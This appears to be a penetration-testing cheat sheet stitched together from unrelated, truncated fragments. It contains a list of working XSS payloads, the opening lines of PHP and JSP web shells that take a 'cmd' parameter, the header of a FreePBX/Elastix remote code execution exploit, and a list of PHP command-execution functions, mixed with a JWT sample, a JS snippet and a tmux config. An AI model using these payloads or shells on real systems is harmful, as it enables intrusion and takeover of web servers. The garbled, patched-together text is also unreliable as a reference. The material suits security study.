- Recon
- Find vuln
- Exploit
- Document it
Run unicornscan from the CLI and nmap from within msfconsole, so that the results are stored as loot in the database.
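// Encode `url` as an array of its UTF-16 code unit values, one integer per
// index (the same values `charCodeAt` yields; astral characters appear as a
// surrogate pair, not a single code point).
const url = "Hello World";
// An index-based mapper keeps the per-code-unit semantics of the original
// loop; `[...url]` or `Array.from(url, fn)` would iterate code points instead.
const data = Array.from({ length: url.length }, (_, i) => url.charCodeAt(i));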
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
<html> | |
<body> | |
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
<input type="TEXT" name="cmd" autofocus id="cmd" size="80"> | |
<input type="SUBMIT" value="Execute"> | |
</form> | |
<pre> | |
<?php | |
if(isset($_GET['cmd'])) | |
{ |
<%@ page import="java.util.*,java.io.*"%> | |
<% | |
%> | |
<HTML><BODY> | |
Commands with JSP | |
<FORM METHOD="GET" NAME="myform" ACTION=""> | |
<INPUT TYPE="text" NAME="cmd"> | |
<INPUT TYPE="submit" VALUE="Send"> | |
</FORM> | |
<pre> |
#!/usr/bin/python | |
############################################################ | |
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
# Google Dork: oy vey | |
# Date: March 23rd, 2012 | |
# Author: muts | |
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
# Tested on: multiple | |
# CVE : notyet | |
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ |
exec - Returns the last line of the command's output
passthru - Passes the command's output directly to the browser
system - Passes the command's output directly to the browser and returns the last line
shell_exec - Returns the command's output
`` (backticks) - Same as shell_exec()
popen - Opens a read or write pipe to the process running a command
proc_open - Similar to popen() but with a greater degree of control
pcntl_exec - Executes a program
Target: | |
{ | |
"alg": "HS256", | |
"typ": "JWT" | |
} | |
{ | |
"sub": "1234567890", | |
"name": "John Doe", | |
"iat": 1516239022 |
# Create ~/.tmux.conf, or append this block to an existing one.

# Prefix key: use C-a instead of tmux's default C-b.
set-option -g prefix C-a
# After the prefix, pressing C-a again sends a literal C-a to the pane.
bind-key C-a send-prefix
# Drop the old default prefix binding.
unbind-key C-b

# Number of scrollback lines kept in window history.
set-option -g history-limit 100000
# Do not let programs running in a pane rename the window.
set-option -g allow-rename off